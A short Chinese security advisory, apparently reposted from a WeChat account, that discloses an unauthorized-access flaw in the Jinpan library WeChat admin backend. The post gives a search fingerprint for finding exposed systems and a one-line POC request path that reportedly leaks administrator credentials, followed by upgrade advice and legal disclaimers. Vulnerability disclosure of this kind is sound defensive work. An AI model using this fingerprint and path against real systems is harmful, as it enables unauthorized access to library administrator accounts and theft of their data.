金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞

admin
admin
admin
138967
文章
114
评论
2023年9月8日00:06:43评论175 views字数 659阅读2分11秒阅读模式

北京金盘鹏图软件技术有限公司的金盘图书馆微信管理后台 getsysteminfo 存在未授权访问漏洞,可获取管理员账号密码等敏感数据,导致攻击者能以管理员身份进入系统窃取敏感信息和危险操作。


指纹:

title=“微信管理后台” && icon_hash=“116323821


POC:

/admin/weichatcfg/getsysteminfo


金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞


修复方法:

官方已发布安全修复版本,请升级至官网最新版本

http://goldlib.com.cn/


金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞

小知识



依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金
金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞

声明



本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。

金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞

欢迎 在看留言分享至朋友圈 三连

 好文推荐  

原文始发于微信公众号(丁永博的成长日记):金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月8日00:06:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞https://cn-sec.com/archives/2013688.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息